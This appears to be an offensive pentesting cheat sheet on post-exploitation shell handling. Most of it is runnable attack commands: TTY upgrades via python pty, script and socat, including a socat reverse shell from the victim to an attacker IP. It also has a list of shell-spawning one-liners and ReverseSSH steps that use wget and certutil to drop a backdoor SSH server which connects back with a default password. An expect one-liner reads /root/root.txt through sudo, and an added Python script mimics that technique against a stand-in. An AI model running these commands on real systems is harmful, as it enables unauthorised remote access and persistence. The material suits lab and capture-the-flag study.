Full TTYs
Note that the shell you set in the SHELL variable must be listed in /etc/shells; otherwise you get the error "The value for the SHELL variable was not found in the /etc/shells file. This incident has been reported". Also note that the next snippets only work from bash: if your local (attacker-side) shell is zsh, run bash and do the upgrade from there, because zsh restores the terminal settings when it foregrounds a job, which undoes the stty raw -echo step below.

Python:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# then press CTRL+Z to background the nc session, run this in your local shell and press Enter:
stty raw -echo; fg
# back inside the remote shell:
export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset
You can get the number of rows and columns of your local terminal by running stty -a (or just stty size) locally, then use those values in the stty rows/columns command on the remote side.
script:
script /dev/null -qc /bin/bash   # /dev/null so no typescript of the session is written to disk
# then press CTRL+Z to background the nc session, run this in your local shell and press Enter:
stty raw -echo; fg
# back inside the remote shell:
export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset
socat:
# Listener (attacker):
socat file:`tty`,raw,echo=0 tcp-listen:4444

# Victim (connects back to the attacker at 10.0.3.4; pty,setsid,sane give a full TTY straight away, no further upgrade needed):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
Spawn shells
- python -c 'import pty; pty.spawn("/bin/sh")'
- python (from inside an interactive interpreter): import os; os.system('/bin/bash')
- /bin/sh -i
- script -qc /bin/bash /dev/null
- perl -e 'exec "/bin/sh";'
- perl (from inside perl): exec "/bin/sh";
- ruby (from inside ruby): exec "/bin/sh"
- lua (from inside lua): os.execute('/bin/sh')
- IRB: exec "/bin/sh"
- vi: :!bash
- vi: :set shell=/bin/bash:shell
- nmap (nmap --interactive, only in old versions): !sh
ReverseSSH

A convenient way to get interactive shell access, as well as file transfers and port forwarding, is dropping the statically linked SSH server ReverseSSH (https://github.com/Fahrj/reverse-ssh) onto the target. The URLs below fetch the upx-compressed x86 builds; pick the release matching the target's architecture.
- (1) Attacker machine: start the listener that will catch the SSH port-forwarding request:
# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh

/dev/shm/reverse-ssh -v -l -p 4444   # -l: listen for the reverse connection on port 4444
- (2a) Linux target (connects back to the listener from step 1; replace <user>@<attacker-ip> with the username to connect back as and the attacker's address):
# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh

/dev/shm/reverse-ssh -p 4444 <user>@<attacker-ip>
- (2b) Windows target (same idea, same <user>@<attacker-ip> placeholder):
# Drop it via your preferred way, e.g.
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe

reverse-ssh.exe -p 4444 <user>@<attacker-ip>
- If the ReverseSSH port-forwarding request was successful, the listener now forwards local port 8888 (ReverseSSH's default) to the SSH server running on the target, and you can log in with the default password letmeinbrudipls in the context of the user running reverse-ssh(.exe):
# Interactive shell access
ssh -p 8888 127.0.0.1

# Bidirectional file transfer
sftp -P 8888 127.0.0.1
- That default password is the same in every stock release, so anyone who can reach the SSH server you just planted can log in with it too. Build your own binary with a different password for anything beyond a throwaway lab, and remove the binary from the target when you are done.
No TTY

If for some reason you cannot obtain a full TTY, you can still interact with programs that expect user input by driving them with expect, which spawns the program on its own pseudo-terminal. In the following example, the password is passed to sudo -S (which reads it from stdin) to read a file:

expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
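The same spawn/expect/send idea in Python, as an added example that is not from the page (the page uses expect): drive() puts the program on a pseudo-terminal, waits until the prompt text shows up in its output, answers it with a carriage return, and collects everything until the program exits. FAKE_SUDO is a constructed stand-in for sudo -S cat /root/root.txt so the script runs anywhere; the function names, the timeout handling and the s3cret/flag{demo} values are my own. Echo is switched off on the pty so the secret never lands in the captured transcript, and a prompt that never arrives raises PromptTimeout instead of hanging forever.

```python
"""Drive a prompting program without a TTY of your own: spawn it on a pty, wait for the prompt, answer it."""
import os
import pty
import select
import subprocess
import termios


class PromptTimeout(Exception):
    """The expected prompt never showed up (wrong pattern, program hung, or it wanted something else first)."""


def drive(argv, prompt, answer, timeout=5.0):
    """expect-style spawn/expect/send: run argv on a pseudo-terminal, wait until `prompt` appears in its
    output, write `answer` followed by a carriage return, then collect output until the program exits."""
    master, slave = pty.openpty()
    # Turn echo off on the pty (sudo does this itself) so the secret we send never appears in the transcript.
    attrs = termios.tcgetattr(slave)
    attrs[3] &= ~termios.ECHO           # attrs[3] is c_lflag
    termios.tcsetattr(slave, termios.TCSANOW, attrs)
    proc = subprocess.Popen(argv, stdin=slave, stdout=slave, stderr=slave, close_fds=True)
    os.close(slave)
    transcript = b""
    answered = False
    try:
        while True:
            ready, _, _ = select.select([master], [], [], timeout)
            if not ready:
                raise PromptTimeout(f"no {prompt!r} within {timeout}s; output so far: {transcript!r}")
            try:
                chunk = os.read(master, 4096)
            except OSError:             # EIO: the child exited and closed its end of the pty
                break
            if not chunk:
                break
            transcript += chunk
            if not answered and prompt.encode() in transcript:
                os.write(master, answer.encode() + b"\r")   # "\r" is what the Enter key sends on a terminal
                answered = True
    finally:
        os.close(master)
        if proc.poll() is None:         # still running (timeout path): do not leave it behind
            proc.kill()
        proc.wait()
    return transcript.decode(errors="replace")


# Constructed stand-in for `sudo -S cat /root/root.txt`: prompts, checks a password, prints the file or an error.
FAKE_SUDO = ["/bin/sh", "-c",
             'printf "[sudo] password for user: "; read -r pw; '
             'if [ "$pw" = "s3cret" ]; then echo "flag{demo}"; else echo "Sorry, try again."; fi']


def read_root_file(password):
    """Mirror of the page's expect one-liner against the stand-in.
    Real use would be drive(["sudo", "-S", "cat", "/root/root.txt"], "password", password)."""
    return drive(FAKE_SUDO, "password", password)


def prompt_never_comes(timeout=0.5):
    """True when drive() gives up on a program that never prompts (e.g. it is blocked on something else)."""
    try:
        drive(["/bin/sh", "-c", "exec sleep 30"], "password", "x", timeout=timeout)
    except PromptTimeout:
        return True
    return False


if __name__ == "__main__":
    print(read_root_file("s3cret"))
```

The prompt is matched against everything received so far rather than the latest chunk, so a prompt split across two reads is still caught; the transcript that comes back contains the program's output but, because echo is disabled, not the password that was typed into it.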